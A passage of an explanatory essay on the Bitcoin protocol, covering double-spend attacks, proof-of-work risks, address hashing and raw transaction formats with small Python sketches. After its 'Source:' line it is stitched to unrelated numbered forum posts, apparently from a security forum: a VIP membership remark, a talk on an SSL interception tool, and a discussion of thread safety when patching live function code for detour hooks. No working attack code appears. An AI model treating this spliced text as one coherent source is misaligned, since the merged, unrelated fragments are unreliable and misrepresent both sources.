An important variant on double spending is if Alice = Bob, i.e., Alice tries to spend a coin with Charlie which she is also "spending" with herself (i.e., giving back to herself). This sounds like it ought to be easy to detect and deal with, but, of course, it's easy on a network to set up multiple identities associated with the same person or organization, so this possibility needs to be considered. In this case, Alice's strategy is to wait until Charlie accepts the infocoin, which happens after the transaction has been confirmed 6 times in the longest chain. She will then attempt to fork the chain before the transaction with Charlie, adding a block which includes a transaction in which she pays herself.

Unfortunately for Alice, it's now very difficult for her to catch up with the longer fork. Other miners won't want to help her out, since they'll be working on the longer fork. And unless Alice is able to solve the proof-of-work at least as fast as everyone else in the network combined – roughly, that means controlling more than fifty percent of the computing power – then she will just keep falling further and further behind. Of course, she might get lucky. We can, for example, imagine a scenario in which Alice controls one percent of the computing power, but happens to get lucky and finds six extra blocks in a row, before the rest of the network has found any extra blocks. In this case, she might be able to get ahead, and get control of the block chain. But this particular event will occur with probability roughly 0.01^6 = 10^-12. A more general analysis along these lines shows that Alice's probability of ever catching up is infinitesimal, unless she is able to solve proof-of-work puzzles at a rate approaching all other miners combined.
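A back-of-the-envelope version of that analysis, along the lines of the random-walk calculation sketched in the original Bitcoin paper: if the honest network finds each next block with probability p and Alice with probability q = 1 - p, then her chance of ever erasing a deficit of z blocks is (q/p)^z when q < p. A quick Python check of the numbers above:

def catch_up_probability(q, z):
    # Probability that an attacker with fraction q of the hash power
    # ever makes up a deficit of z blocks (gambler's-ruin style estimate).
    p = 1.0 - q
    return 1.0 if q >= p else (q / p) ** z

print(catch_up_probability(0.01, 6))  # roughly 1e-12: hopeless for Alice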
Of course, this is not a rigorous security analysis showing that Alice cannot double spend. It's merely an informal plausibility argument. The original paper introducing Bitcoin did not, in fact, contain a rigorous security analysis, only informal arguments along the lines I've presented here. The security community is still analysing Bitcoin, and trying to understand possible vulnerabilities. You can see some of this research listed here, and I mention a few related problems in the "Problems for the author" below. At this point I think it's fair to say that the jury is still out on how secure Bitcoin is.

The proof-of-work and mining ideas give rise to many questions. How much reward is enough to persuade people to mine? How does the change in supply of infocoins affect the Infocoin economy? Will Infocoin mining end up concentrated in the hands of a few, or many? If it's just a few, doesn't that endanger the security of the system? Presumably transaction fees will eventually equilibrate – won't this introduce an unwanted source of friction, and make small transactions less desirable? These are all great questions, but beyond the scope of this post. I may come back to the questions (in the context of Bitcoin) in a future post. For now, we'll stick to our focus on understanding how the Bitcoin protocol works.

Problems for the author

I don't understand why double spending can't be prevented in a simpler manner using two-phase commit. Suppose Alice tries to double spend an infocoin with both Bob and Charlie. The idea is that Bob and Charlie would each broadcast their respective messages to the Infocoin network, along with a request: "Should I accept this?" They'd then wait some period – perhaps ten minutes – to hear any naysayers who could prove that Alice was trying to double spend. If no such nays are heard (and provided there are no signs of attempts to disrupt the network), they'd then accept the transaction. This protocol needs to be hardened against network attacks, but it seems to me to be the core of a good alternate idea. How well does this work? What drawbacks and advantages does it have compared to the full Bitcoin protocol?

Early in the section I mentioned that there is a natural way of reducing the variance in time required to validate a block of transactions. If that variance is reduced too much, then it creates an interesting attack possibility. Suppose Alice tries to fork the chain in such a way that: (a) one fork starts with a block in which Alice pays herself, while the other fork starts with a block in which Alice pays Bob; (b) both blocks are announced nearly simultaneously, so roughly half the miners will attempt to mine each fork; (c) Alice uses her mining power to try to keep the forks of roughly equal length, mining whichever fork is shorter – this is ordinarily hard to pull off, but becomes significantly easier if the standard deviation of the time-to-validation is much shorter than the network latency; (d) after 5 blocks have been mined on both forks, Alice throws her mining power into making it more likely that Bob's transaction is confirmed; and (e) after confirmation of Bob's transaction, she then throws her computational power into the other fork, and attempts to regain the lead. This balancing strategy will have only a small chance of success. But while the probability is small, it will certainly be much larger than in the standard protocol, with high variance in the time to validate a block. Is there a way of avoiding this problem?

Suppose Bitcoin mining software always explored nonces starting with x = 0, then x = 1, x = 2, and so on. If this is done by all (or even just a substantial fraction) of Bitcoin miners then it creates a vulnerability. Namely, it's possible for someone to improve their odds of solving the proof-of-work merely by starting with some other (much larger) nonce. More generally, it may be possible for attackers to exploit any systematic patterns in the way miners explore the space of nonces. More generally still, in the analysis of this section I have implicitly assumed a kind of symmetry between different miners. In practice, there will be asymmetries and a thorough security analysis will need to account for those asymmetries.

Bitcoin

Let's move away from Infocoin, and describe the actual Bitcoin protocol. There are a few new ideas here, but with one exception (discussed below) they're mostly obvious modifications to Infocoin. To use Bitcoin in practice, you first install a wallet program on your computer. To give you a sense of what that means, here's a screenshot of a wallet called MultiBit.
You can see the Bitcoin balance on the left — 0.06555555 Bitcoins, or about 70 dollars at the exchange rate on the day I took this screenshot — and on the right two recent transactions, which deposited those 0.06555555 Bitcoins.

Suppose you're a merchant who has set up an online store, and you've decided to allow people to pay using Bitcoin. What you do is tell your wallet program to generate a Bitcoin address. In response, it will generate a public / private key pair, and then hash the public key to form your Bitcoin address. You then send your Bitcoin address to the person who wants to buy from you. You could do this in email, or even put the address up publicly on a webpage. This is safe, since the address is merely a hash of your public key, which can safely be known by the world anyway. (I'll return later to the question of why the Bitcoin address is a hash, and not just the public key.)
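For the curious, here is a Python sketch of the standard address construction as I understand it: hash the public key with SHA-256 and then RIPEMD-160, and encode the result (plus a version byte and a checksum) in Base58. The key bytes below are a placeholder, not a real key, and note that RIPEMD-160 support in hashlib depends on the local OpenSSL build:

import hashlib

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def base58check(payload):
    # Append a 4-byte double-SHA-256 checksum, then encode in base 58.
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    data = payload + checksum
    n = int.from_bytes(data, "big")
    encoded = ""
    while n > 0:
        n, r = divmod(n, 58)
        encoded = B58_ALPHABET[r] + encoded
    # Each leading zero byte is conventionally encoded as the character '1'.
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + encoded

def bitcoin_address(public_key):
    # Version byte 0x00 marks an ordinary (mainnet) pay-to-pubkey-hash address.
    # Note: ripemd160 may be unavailable in some OpenSSL builds.
    h = hashlib.new("ripemd160", hashlib.sha256(public_key).digest()).digest()
    return base58check(b"\x00" + h)

print(bitcoin_address(b"\x04" + b"\x11" * 64))  # placeholder key bytes, for illustration only

Inside a raw transaction, as in the data we'll look at next, the address appears as the bare RIPEMD-160 hash in hexadecimal; the Base58Check string (starting with a '1') is the form wallets display and the one you'd paste into an email.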
The person who is going to pay you then generates a transaction. Let's take a look at the data from an actual transaction transferring bitcoins. What's shown below is very nearly the raw data. It's changed in three ways: (1) the data has been deserialized; (2) line numbers have been added, for ease of reference; and (3) I've abbreviated various hashes and public keys, just putting in the first six hexadecimal digits of each, when in reality they are much longer. Here's the data:

1. {"hash":"7c4025...",
2. "ver":1,
3. "vin_sz":1,
4. "vout_sz":1,
5. "lock_time":0,
6. "size":224,
7. "in":[
8. {"prev_out":
9. {"hash":"2007ae...",
10. "n":0},
11. "scriptSig":"304502... 042b2d..."}],
12. "out":[
13. {"value":"0.31900000",
14. "scriptPubKey":"OP_DUP OP_HASH160 a7db6f... OP_EQUALVERIFY OP_CHECKSIG"}]}

Let's go through this, line by line. Line 1 contains the hash of the remainder of the transaction, 7c4025..., expressed in hexadecimal. This is used as an identifier for the transaction. Line 2 tells us that this is a transaction in version 1 of the Bitcoin protocol. Lines 3 and 4 tell us that the transaction has one input and one output, respectively. I'll talk below about transactions with more inputs and outputs, and why that's useful. Line 5 contains the value for lock_time, which can be used to control when a transaction is finalized. For most Bitcoin transactions being carried out today the lock_time is set to 0, which means the transaction is finalized immediately. Line 6 tells us the size (in bytes) of the transaction. Note that it's not the monetary amount being transferred! That comes later.

Lines 7 through 11 define the input to the transaction. In particular, lines 8 through 10 tell us that the input is to be taken from the output from an earlier transaction, with the given hash, which is expressed in hexadecimal as 2007ae.... The n=0 tells us it's to be the first output from that transaction; we'll see soon how multiple outputs (and inputs) from a transaction work, so don't worry too much about this for now. Line 11 contains the signature of the person sending the money, 304502..., followed by a space, and then the corresponding public key, 042b2d.... Again, these are both in hexadecimal.

One thing to note about the input is that there's nothing explicitly specifying how many bitcoins from the previous transaction should be spent in this transaction. In fact, all the bitcoins from the n=0th output of the previous transaction are spent. So, for example, if the n=0th output of the earlier transaction was 2 bitcoins, then 2 bitcoins will be spent in this transaction. This seems like an inconvenient restriction – like trying to buy bread with a 20 dollar note, and not being able to break the note down. The solution, of course, is to have a mechanism for providing change. This can be done using transactions with multiple inputs and outputs, which we'll discuss in the next section.

Lines 12 through 14 define the output from the transaction. In particular, line 13 tells us the value of the output, 0.319 bitcoins. Line 14 is somewhat complicated. The main thing to note is that the string a7db6f... is the Bitcoin address of the intended recipient of the funds (written in hexadecimal). In fact, line 14 is actually an expression in Bitcoin's scripting language. I'm not going to describe that language in detail in this post; the important thing to take away now is just that a7db6f... is the Bitcoin address.

You can now see, by the way, how Bitcoin addresses the question I swept under the rug in the last section: where do Bitcoin serial numbers come from? In fact, the role of the serial number is played by transaction hashes. In the transaction above, for example, the recipient is receiving 0.319 Bitcoins, which come out of the first output of an earlier transaction with hash 2007ae... (line 9). If you go and look in the block chain for that transaction, you'd see that its output comes from a still earlier transaction. And so on.

There are two clever things about using transaction hashes instead of serial numbers. First, in Bitcoin there's not really any separate, persistent "coins" at all, just a long series of transactions in the block chain. It's a clever idea to realize that you don't need persistent coins, and can just get by with a ledger of transactions. Second, by operating in this way we remove the need for any central authority issuing serial numbers. Instead, the serial numbers can be self-generated, merely by hashing the transaction.

In fact, it's possible to keep following the chain of transactions further back in history. Ultimately, this process must terminate. This can happen in one of two ways. The first possibility is that you'll arrive at the very first Bitcoin transaction, contained in the so-called Genesis block. This is a special transaction, having no inputs, but a 50 Bitcoin output. In other words, this transaction establishes an initial money supply. The Genesis block is treated separately by Bitcoin clients, and I won't get into the details here, although it's along similar lines to the transaction above. You can see the deserialized raw data here, and read about the Genesis block here.

The second possibility when you follow a chain of transactions back in time is that eventually you'll arrive at a so-called coinbase transaction. With the exception of the Genesis block, every block of transactions in the block chain starts with a special coinbase transaction. This is the transaction rewarding the miner who validated that block of transactions. It uses a similar but not identical format to the transaction above. I won't go through the format in detail, but if you want to see an example, see here. You can read a little more about coinbase transactions here.
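Before moving on, a sketch to make the "transaction hashes as serial numbers" point concrete. To the best of my knowledge, the identifier in line 1 is computed by hashing the serialized transaction twice with SHA-256, and is conventionally displayed with the byte order reversed:

import hashlib

def txid(raw_transaction_bytes):
    # Double SHA-256, then reverse the bytes for the conventional display order.
    digest = hashlib.sha256(hashlib.sha256(raw_transaction_bytes).digest()).digest()
    return digest[::-1].hex()

Because the identifier is just a hash, anyone can recompute it from the transaction itself: no issuing authority is required.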
Something I haven't been precise about above is what exactly is being signed by the digital signature in line 11. The obvious thing to do is for the payer to sign the whole transaction (apart from the transaction hash, which, of course, must be generated later). Currently, this is not what is done – some pieces of the transaction are omitted. This makes some pieces of the transaction malleable, i.e., they can be changed later. However, this malleability does not extend to the amounts being paid out, or to the senders and recipients, which can't be changed later. I must admit I haven't dug down into the details here. I gather that this malleability is under discussion in the Bitcoin developer community, and there are efforts afoot to reduce or eliminate this malleability.

Transactions with multiple inputs and outputs

In the last section I described how a transaction with a single input and a single output works. In practice, it's often extremely convenient to create Bitcoin transactions with multiple inputs or multiple outputs. I'll talk below about why this can be useful. But first let's take a look at the data from an actual transaction:

1. {"hash":"993830...",
2. "ver":1,
3. "vin_sz":3,
4. "vout_sz":2,
5. "lock_time":0,
6. "size":552,
7. "in":[
8. {"prev_out":{
9. "hash":"3beabc...",
10. "n":0},
11. "scriptSig":"304402... 04c7d2..."},
12. {"prev_out":{
13. "hash":"fdae9b...",
14. "n":0},
15. "scriptSig":"304502... 026e15..."},
16. {"prev_out":{
17. "hash":"20c86b...",
18. "n":1},
19. "scriptSig":"304402... 038a52..."}],
20. "out":[
21. {"value":"0.01068000",
22. "scriptPubKey":"OP_DUP OP_HASH160 e8c306... OP_EQUALVERIFY OP_CHECKSIG"},
23. {"value":"4.00000000",
24. "scriptPubKey":"OP_DUP OP_HASH160 d644e3... OP_EQUALVERIFY OP_CHECKSIG"}]}

Let's go through the data, line by line. It's very similar to the single-input-single-output transaction, so I'll do this pretty quickly. Line 1 contains the hash of the remainder of the transaction. This is used as an identifier for the transaction. Line 2 tells us that this is a transaction in version 1 of the Bitcoin protocol. Lines 3 and 4 tell us that the transaction has three inputs and two outputs, respectively. Line 5 contains the lock_time. As in the single-input-single-output case, this is set to 0, which means the transaction is finalized immediately. Line 6 tells us the size of the transaction in bytes.

Lines 7 through 19 define a list of the inputs to the transaction. Each corresponds to an output from a previous Bitcoin transaction. The first input is defined in lines 8 through 11. In particular, lines 8 through 10 tell us that the input is to be taken from the n=0th output from the transaction with hash 3beabc.... Line 11 contains the signature, followed by a space, and then the public key of the person sending the bitcoins. Lines 12 through 15 define the second input, with a similar format to lines 8 through 11. And lines 16 through 19 define the third input.

Lines 20 through 24 define a list containing the two outputs from the transaction. The first output is defined in lines 21 and 22. Line 21 tells us the value of the output, 0.01068000 bitcoins. As before, line 22 is an expression in Bitcoin's scripting language. The main thing to take away here is that the string e8c306... is the Bitcoin address of the intended recipient of the funds. The second output is defined in lines 23 and 24, with a similar format to the first output.

One apparent oddity in this description is that although each output has a Bitcoin value associated to it, the inputs do not. Of course, the values of the respective inputs can be found by consulting the corresponding outputs in earlier transactions. In a standard Bitcoin transaction, the sum of all the inputs in the transaction must be at least as much as the sum of all the outputs.
(The only exceptions to this principle are the Genesis block and coinbase transactions, both of which add to the overall Bitcoin supply.) If the inputs sum up to more than the outputs, then the excess is used as a transaction fee. This is paid to whichever miner successfully validates the block which the current transaction is a part of.

That's all there is to multiple-input-multiple-output transactions! They're a pretty simple variation on single-input-single-output transactions.

One nice application of multiple-input-multiple-output transactions is the idea of change. Suppose, for example, that I want to send you 0.15 bitcoins. I can do so by spending money from a previous transaction in which I received 0.2 bitcoins. Of course, I don't want to send you the entire 0.2 bitcoins. The solution is to send you 0.15 bitcoins, and to send 0.05 bitcoins to a Bitcoin address which I own. Those 0.05 bitcoins are the change. Of course, it differs a little from the change you might receive in a store, since change in this case is what you pay yourself. But the broad idea is similar.
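In code, the bookkeeping is nothing more than subtraction. A sketch in satoshis (the 10^-8 bitcoin unit mentioned earlier), with invented amounts and address names:

SATOSHI = 10 ** 8

previous_output = 20 * SATOSHI // 100   # an earlier transaction paid me 0.2 BTC
payment = 15 * SATOSHI // 100           # I want to send you 0.15 BTC
change = previous_output - payment      # 0.05 BTC goes back to an address I own

outputs = [("your_address", payment), ("my_change_address", change)]

If I'd left a little of the input unassigned, the difference would have gone to the winning miner as a transaction fee, as described above.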
Conclusion

That completes a basic description of the main ideas behind Bitcoin. Of course, I've omitted many details – this isn't a formal specification. But I have described the main ideas behind the most common use cases for Bitcoin. While the rules of Bitcoin are simple and easy to understand, that doesn't mean that it's easy to understand all the consequences of the rules. There is vastly more that could be said about Bitcoin, and I'll investigate some of these issues in future posts. For now, though, I'll wrap up by addressing a few loose ends.

How anonymous is Bitcoin? Many people claim that Bitcoin can be used anonymously. This claim has led to the formation of marketplaces such as Silk Road (and various successors), which specialize in illegal goods. However, the claim that Bitcoin is anonymous is a myth. The block chain is public, meaning that it's possible for anyone to see every Bitcoin transaction ever. Although Bitcoin addresses aren't immediately associated to real-world identities, computer scientists have done a great deal of work figuring out how to de-anonymize "anonymous" social networks. The block chain is a marvellous target for these techniques. I will be extremely surprised if the great majority of Bitcoin users are not identified with relatively high confidence and ease in the near future. The confidence won't be high enough to achieve convictions, but will be high enough to identify likely targets. Furthermore, identification will be retrospective, meaning that someone who bought drugs on Silk Road in 2011 will still be identifiable on the basis of the block chain in, say, 2020. These de-anonymization techniques are well known to computer scientists, and, one presumes, therefore to the NSA. I would not be at all surprised if the NSA and other agencies have already de-anonymized many users. It is, in fact, ironic that Bitcoin is often touted as anonymous. It's not. Bitcoin is, instead, perhaps the most open and transparent financial instrument the world has ever seen.

Can you get rich with Bitcoin? Well, maybe. Tim O'Reilly once said: "Money is like gas in the car – you need to pay attention or you'll end up on the side of the road – but a well-lived life is not a tour of gas stations!" Much of the interest in Bitcoin comes from people whose life mission seems to be to find a really big gas station. I must admit I find this perplexing. What is, I believe, much more interesting and enjoyable is to think of Bitcoin and other cryptocurrencies as a way of enabling new forms of collective behaviour. That's intellectually fascinating, offers marvellous creative possibilities, is socially valuable, and may just also put some money in the bank. But if money in the bank is your primary concern, then I believe that other strategies are much more likely to succeed.

Details I've omitted: Although this post has described the main ideas behind Bitcoin, there are many details I haven't mentioned. One is a nice space-saving trick used by the protocol, based on a data structure known as a Merkle tree. It's a detail, but a splendid detail, and worth checking out if fun data structures are your thing. You can get an overview in the original Bitcoin paper. Second, I've said little about the Bitcoin network – questions like how the network deals with denial of service attacks, how nodes join and leave the network, and so on. This is a fascinating topic, but it's also something of a mess of details, and so I've omitted it. You can read more about it at some of the links above.

Bitcoin scripting: In this post I've explained Bitcoin as a form of digital, online money. But this is only a small part of a much bigger and more interesting story. As we've seen, every Bitcoin transaction is associated to a script in the Bitcoin programming language. The scripts we've seen in this post describe simple transactions like "Alice gave Bob 10 bitcoins". But the scripting language can also be used to express far more complicated transactions. To put it another way, Bitcoin is programmable money. In later posts I will explain the scripting system, and how it is possible to use Bitcoin scripting as a platform to experiment with all sorts of amazing financial instruments.

Thanks for reading. If you enjoyed this essay, you may also enjoy the first chapter of my forthcoming book on neural networks and deep learning, and consider supporting its writing through Indiegogo. You may also wish to follow me on Twitter.

Footnote

[1] In the United States the question "Is money a form of speech?" is an important legal question, because of the protection afforded speech under the US Constitution. In my (legally uninformed) opinion digital money may make this issue more complicated. As we'll see, the Bitcoin protocol is really a way of standing up before the rest of the world (or at least the rest of the Bitcoin network) and avowing "I'm going to give such-and-such a number of bitcoins to so-and-so a person" in a way that's extremely difficult to repudiate. At least naively, it looks more like speech than exchanging copper coins, say.

Source: How the Bitcoin protocol actually works | DDI
  21. Nobody is getting VIP just for posting here that they can jack off with their feet. Whoever wants VIP will have to prove they deserve it. If not, we will pick the right people ourselves, at the right time.
  22. HTTPS Everywhere (Firefox addon).
  23. Thanks. I'll probably make the source code public after the holidays, when I hope to have some more time to work on it and give it at least some "shape", so it can actually be used.
  24. Every Thursday at 19:00, usually at Club Mojo (Bucharest, around the Old Town), there are technical talks, socializing, and drinks. Tomorrow, 05 Dec, I'll be presenting SSL Ripper, the same material I presented on Saturday at Defcamp. Hopefully in Romanian; my English is a bit shaky. More details: https://www.rotunneling.net/articole/rotunneling-vpn-recomanda-pasionatilor-de-it-talks-by-softbinator/ Cheater will have to buy a beer; friends know why.
  25. Yes, but the "copy & replace" solution is not 100% thread safe. You have 5 bytes: push ebp; mov ebp, esp, i.e., 2 instructions. If a thread has executed ONLY "push ebp" and then you write the "jmp"... it's no longer OK. As in the link above: "The problem with Detouring a function during live execution is that you can never be sure that at the moment you are patching in the Detour, another thread isn't in the middle of executing an instruction that overlaps the first five bytes of the function. (And you have to alter the code generation so that no instruction starting at offsets 1 through 4 of the function is ever the target of a jump.)" Granted, that's paranoia and I think it's quite unlikely to actually happen, but it's still possible. Note: I forgot (I didn't want to risk breaking the project) to call FlushInstructionCache; that really should be done after modifying the code.